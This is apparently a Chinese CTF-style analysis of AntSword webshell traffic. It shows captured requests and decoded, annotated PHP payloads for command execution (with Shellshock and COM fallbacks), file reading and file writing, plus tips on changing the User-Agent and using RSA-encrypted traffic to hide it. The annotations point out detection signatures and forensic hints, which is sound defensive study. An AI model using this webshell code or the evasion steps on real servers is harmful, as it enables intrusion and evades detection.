代码跟之前的一模一样。注意上面的解码结果被解码工具统一转成了小写(`$_server["script_filename"]`、`exception`、`getmessage` 等),`str_rot13` 本身是保留大小写的,原始报文里的 `$_FREIRE["FPEVCG_SVYRANZR"]` 解码后应为 `$_SERVER["SCRIPT_FILENAME"]`,与前面几个样本完全一致。

虚拟终端

测试一个最简单的ls命令

POST /shell0.php HTTP/1.1
Host: 192.168.217.128:100
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 4019
Connection: close

c5980976ee6af=&cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2201fba%22%3Becho%20%40asenc(%24output)%3Becho%20%2278e6dcac%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%22mbd5f87b32df2b%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%22dd32c0973cea1a%22%5D)%3B%24envstr%3D%40base64_decode(%24_POST%5B%22c5980976ee6af%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3
E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&dd32c0973cea1a=Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ%3D%3D&mbd5f87b32df
2b=L2Jpbi9zaA%3D%3D

url解码,格式化

c5980976ee6af=
cmd=
# Same fixed prefix as every other sample: silence errors, no time limit.
@ini_set("display_errors", "0");
@set_time_limit(0);
# Encoder hook for the response body; identity with the default encoder.
function asenc($out){
return $out;
};
# Flush the buffered command output between this request's random markers
# ("01fba" / "78e6dcac"); same wrapper as the connection-test payload.
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "01fba";
echo @asenc($output);
echo "78e6dcac";
}
ob_start();# buffer all output until asoutput() releases it between the markers
try{
# Inputs, all base64 in randomly named POST params (values from this capture, see the
# decoded params below the listing): $p = program to run ("/bin/sh"), $s = command line
# ('cd "/var/www/html";ls;echo [S];pwd;echo [E]'), $envstr = extra environment (empty here).
$p=base64_decode($_POST["mbd5f87b32df2b"]);
$s=base64_decode($_POST["dd32c0973cea1a"]);
$envstr=@base64_decode($_POST["c5980976ee6af"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
# OS is guessed from the script directory: "/" prefix -> Unix "-c", otherwise Windows "/c".
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
# Extend PATH so $p and the command resolve even under a stripped-down web-server environment;
# both PATH strings are fixed in the payload.
if(substr($d,0,1)=="/"){
@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
}else{
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;")
# (the raw request has a ";" after this call; it was lost when the listing was reformatted)
}
# Optional extra environment: entries separated by "|||asline|||", "=" spelled "|||askey|||".
# Both separators are fixed strings and make good detection signatures.
if(!empty($envstr)){
$envarr=explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r="{$p} {$c}";# e.g. /bin/sh -c "cd "/var/www/html";ls;echo [S];pwd;echo [E]"
# fe(): true if $f exists, is callable and is not listed in disable_functions.
# (explode() never returns an empty array, so the empty() branch is dead — harmless.)
function fe($f){
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)){
$d=array();
} else{
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
};
# Shellshock fallback for when every exec-style function is disabled: if /bin/sh is bash,
# export a crafted function definition ("() { x; }; <cmd>") through the environment and make
# PHP spawn its mail transport via error_log(...,1) / mail() so bash imports and runs it;
# output is collected through a temp file. Only works against an unpatched bash.
# "PHP_LOL" and the "() { x; };" string are fixed markers worth alerting on.
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("a@127.0.0.1", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
}
;
# runcmd(): try every command-execution primitive in order — system, passthru, shell_exec,
# exec, popen, proc_open, the non-standard antsystem(), then the Shellshock trick, then
# COM WScript.shell on Windows; returns 127 when nothing is available. Blocking only some
# of these via disable_functions is therefore not enough.
function runcmd($c){
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')){
@system($c,$ret);
} elseif(fe('passthru')){
@passthru($c,$ret);
} elseif(fe('shell_exec')){
print(@shell_exec($c));
} elseif(fe('exec')){
@exec($c,$o,$ret);
print(join("",$o));# the raw request has "\n" (%0A) as the join separator; the newline was lost in this listing
} elseif(fe('popen')){
$fp=@popen($c,'r');
while(!@feof($fp)){
print(@fgets($fp,2048));
}
@pclose($fp);
} elseif(fe('proc_open')){
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])){
print(@fgets($io[1],2048));
}
while(!@feof($io[2])){
print(@fgets($io[2],2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
} elseif(fe('antsystem')){
@antsystem($c);
} elseif(runshellshock($d, $c)) {
return $ret;
} elseif(substr($d,0,1)!="/" && @class_exists("COM")){
$w=new COM('WScript.shell');
$e=$w->exec($c);
$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);
} else{
$ret = 127;
}
return $ret;
};
$ret=@runcmd($r." 2>&1");# stderr is merged into stdout so error text comes back too
print ($ret!=0)?"ret={$ret}":"";# a non-zero exit status is appended as "ret=N"
;
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
dd32c0973cea1a=Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ==
# cd "/var/www/html";ls;echo [S];pwd;echo [E]
mbd5f87b32df2b=L2Jpbi9zaA==
# /bin/sh

大致流程:`$p`(这里是 `/bin/sh`)和 `$s`(要执行的命令)分别从两个随机命名的 POST 参数 base64 解码,拼成 `/bin/sh -c "..."`,先把常见 bin 目录追加到 PATH,再由 `runcmd()` 依次尝试 `system`、`passthru`、`shell_exec`、`exec`、`popen`、`proc_open`、`antsystem`,都不可用就用 `runshellshock()`(通过 `putenv` 注入 `() { x; }; ...` 再用 `error_log`/`mail` 触发 bash)碰运气,Windows 上最后还会试 COM 的 `WScript.shell`;命令后面统一追加 `2>&1` 把 stderr 一起带回。`|||asline|||`、`|||askey|||`、`runshellshock`、`antsystem`、`PHP_LOL` 这些字符串在报文里是固定的,是很好的检测特征;只靠 `disable_functions` 禁掉其中几个函数并不够。命令本身 `cd "/var/www/html";ls;echo [S];pwd;echo [E]` 里用 `[S]`/`[E]` 包住 `pwd`,看起来是客户端用来解析当前目录的。实在是太长了。。。

文件管理

读取文件

cmd=
# Same fixed prefix as every other sample: silence errors, no time limit.
@ini_set("display_errors", "0");
@set_time_limit(0);
# Encoder hook for the response body; identity with the default encoder.
function asenc($out){
return $out;
};
# Flush the buffered file contents between this request's random markers
# ("79dfaa6a" / "6befcf28f0f8"); same wrapper as the other samples.
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "79dfaa6a";
echo @asenc($output);
echo "6befcf28f0f8";
}
ob_start();
try{
$F=base64_decode($_POST["xcb1bd75c217ce"]);# target path, base64 in a random POST param ("/var/www/html/index.php" here)
$P=@fopen($F,"r");# open for reading: any file the web-server user can read can be pulled this way
echo(@fread($P,filesize($F)?filesize($F):4096));# read the whole file; if filesize() is 0/false, read 4096 bytes (4 KiB, not 4 MB) — output lands in the buffer
@fclose($P);;
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
xcb1bd75c217ce=L3Zhci93d3cvaHRtbC9pbmRleC5waHA=
#/var/www/html/index.php

新建文件

cmd=
# Same fixed prefix as every other sample: silence errors, no time limit.
@ini_set("display_errors", "0");
@set_time_limit(0);
# Encoder hook for the response body; identity with the default encoder.
function asenc($out){
return $out;
};
# Flush the buffered "1"/"0" result between this request's random markers
# ("4e2d44f" / "e9188218b"); same wrapper as the other samples.
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "4e2d44f";
echo @asenc($output);
echo "e9188218b";
}
ob_start();
try{
# Open the target path for writing (truncating it) and write the decoded content; replies "1"
# when fwrite() wrote something, "0" otherwise. Path and content arrive base64-encoded in two
# random POST params ("/var/www/html/test.txt" and "#Halo AntSword!" in this capture).
# The handle is never closed explicitly.
echo @fwrite(fopen(base64_decode($_POST["xcb1bd75c217ce"]),"w"),base64_decode($_POST["rc3235e6b73a85"]))?"1":"0";
;}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
rc3235e6b73a85=I0hhbG8gQW50U3dvcmQh
# base64 解码为 `#Halo AntSword!`(开头的 `#` 是写入文件内容的一部分,不是注释符号;看起来是蚁剑新建文件时写入的默认内容)
xcb1bd75c217ce=L3Zhci93d3cvaHRtbC90ZXN0LnR4dA==
#/var/www/html/test.txt

写入文件

# Same fixed prefix as every other sample: silence errors, no time limit.
@ini_set("display_errors", "0");
@set_time_limit(0);
# Encoder hook for the response body; identity with the default encoder.
function asenc($out){
return $out;
}
;
# Flush the buffered "1"/"0" result between this request's random markers
# ("f9e3e350bf" / "3721032877"); same wrapper as the other samples.
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "f9e3e350bf";
echo @asenc($output);
echo "3721032877";
}
ob_start();
try{
# Same write primitive as "new file": open the path for writing (truncating it) and write the
# decoded content, replying "1"/"0". Only the random param names differ
# ("/var/www/html/test.txt" and "test" in this capture). The handle is never closed explicitly.
echo @fwrite(fopen(base64_decode($_POST["oa037d12e7ff1b"]),"w"),base64_decode($_POST["oa5bfdf2210f2e"]))?"1":"0";
;
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
oa037d12e7ff1b=L3Zhci93d3cvaHRtbC90ZXN0LnR4dA==
#/var/www/html/test.txt
oa5bfdf2210f2e=dGVzdA==
#test

优化

更改UA头

E:\ctf\CTFTOOLS\web\antSword\antSword-2.1.8.1\modules\request.js
中改。不过这只是去掉了最明显的 UA 特征,请求体里的 PHP 代码前缀和响应中的随机标记并不受这个改动影响,仍然可以据此识别。

// User-Agent sent with every request (the default is "antSword/v2.1", see the captures above).
// Overriding it with a browser-looking string removes only the most obvious network indicator;
// the PHP payload body and the marker-wrapped response are produced elsewhere and are
// presumably unaffected by this constant, so body-based signatures still apply.
const USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';

RSA加密流量

利用自带的 RSA 编码器生成公钥/私钥,将生成的 PHP 木马上传到服务器(服务端要解密请求,所以解密用的密钥应当就在这个 PHP 文件里——取证时拿到 shell 文件就有机会还原被加密的历史流量),蚁剑将编码器改为 rsa 后重新连接

ant=la3KN%2BFosCL%2BwV8SoqFXbjysNZv3Pipg13BSNrtfHRoaXkGJAhLoO2OXtO%2Bu47K87url5Sl6fH%2FtQmjw2sb%2B9kRhIrFxK5bZkOW9BBGtCvNh54n6rCVLeRXDWxkrYhtGuXHZANxxLpJ0%2BKTeThGLCKosfWHbTRn1dJlHy95qLoY%3D%7CxfdFU25cqoWX6%2FkpRLK%2FdOGrWws1NSnArRYMhW3MSRVil2nDp6pkcDLGSwkM1D1hL09kzqZQagSYN37sH%2FMymehinfsD5gGIZJUANmf17X%2BjbS0zObtl68%2FVCmUpvL5stF7mXU6LgdTY2VFvhb2rmuAHm2PcR6ulWBvZxgJoc8U%3D%7Cos9zBh%2FkldShM88wE7jD20L%2BorzmNz%2B%2BFpb8sZbCQWhwtAyrdCux9NIKegA%2FGf6UfZDXWF974NHNo%2BeKrUsid4lw%2BcoEu0ISLD%2FezteTHeBHAwZjPblBwHb7dU6C7Rt8%2F6DwX3MbJxXwcVb1mplukykpCGSG%2BV9X2ipWrac2NcM%3D%7Cx5tBL8n39xfH2LDI3tiug%2F0xbrA9sualN32DxTWc1DS3daqd0Zk%2BOptNFLYblMK89gzDmDYodgY0rs%2FCoQ6s9SD4R%2BXVo8hmI%2FsiGTbKc64HtrVld0xRmkYKanZZuBYu7fUYXWEt35%2FlI5916YZlV3Kk81jXrXCxoRhzUzQ%2B0c8%3D%7CfHn6ZNFKKeKI7GyN7fiod75nffVYYJZ4GEVsdYnMOAEw6Ds45RbIm64Xz5KGZb%2B8K%2FUUSbm%2B0GaSAEWKMzvdGicdAh%2BW7QpG8YnvKEJ1QbyB7xF6Ncba4TGX5iL3e0lNF8rZLUXlkw7NLSi3KN5HZecXlUQ0gD1OqoQ%2BR3VzIYg%3D%7Cjw7awkFmEOao3qxJNOLAO5PyBdyCympc7KDUIs7rrKnJzRhqSUHVffZdyoSglh37qBzr0g3MM3W33wxwq4BnMUtaIJHsnLrashxQjdKxLPB1RuOYjKorLYI5NcWxl6WunTrMf2c%2FMcV%2F5OU8dtQoSkEmRlh9W%2F8ljK2KHc2q3c4%3D%7Ctx6yz2bhEQ8v7E6blADNV2KGVhSXaU484aHodI1Es15yFHlaFRAs6NPCDfArzD%2Byj%2FZtvs%2F%2FItIbZG7mvlQnrQmSqeK5JrLoKcDVSxsuJnS5fZteBt9z1cZv%2BNm5JfPwTIIVZk7OZhXULD6%2Fy3UZIDNAYqzftQAfLzsLjSvWR0U%3D%7CKvLYMP7S3qkOwjv8JX6Es1EJIj8IUgkzwvfQza8j88sYPLM8IZ1fuDM6efkIYW%2BYzI1Pdkv05asoIcVo4wnvFxIxK286gqNgx8c6BWJ96yhrglrHP9YwUzcEhBSrb3Anjc4gsm3cwKhgEpYwcFzpex2DYp5AsRK2p4w%2FvzyGPoI%3D%7CosyGM9%2BgL45wtui9oYPhJHb2to%2BowQnyL5Lbu5t2vODSk3O6wa1yLLjmBNTQQpeJvmm%2BBYzKGi3AHptab0DXbkmEtbh2aBWF2L5RJb%2Bqem487zbaylCb%2BN2ckSED47zmPgZ8Tr00jkR%2Fr82oEEV1ToJ6T7zO%2BMzPe3hAG0jbPE4%3D

可以看到数据已经被加密了:参数名变成了 `ant`,参数值是用 `|`(URL 编码为 `%7C`)分隔的多段 base64,看起来是按块 RSA 加密后再 base64 的结果。内容确实看不到了,但"单个参数、多段长度相近的 base64 用 `|` 拼接"这种形态本身仍然是可识别的特征;另外本文没有展示响应方向,响应是否同样被加密还需要另行确认。

参考

https://www.freebuf.com/articles/web/264896.html
https://zhuanlan.zhihu.com/p/369496846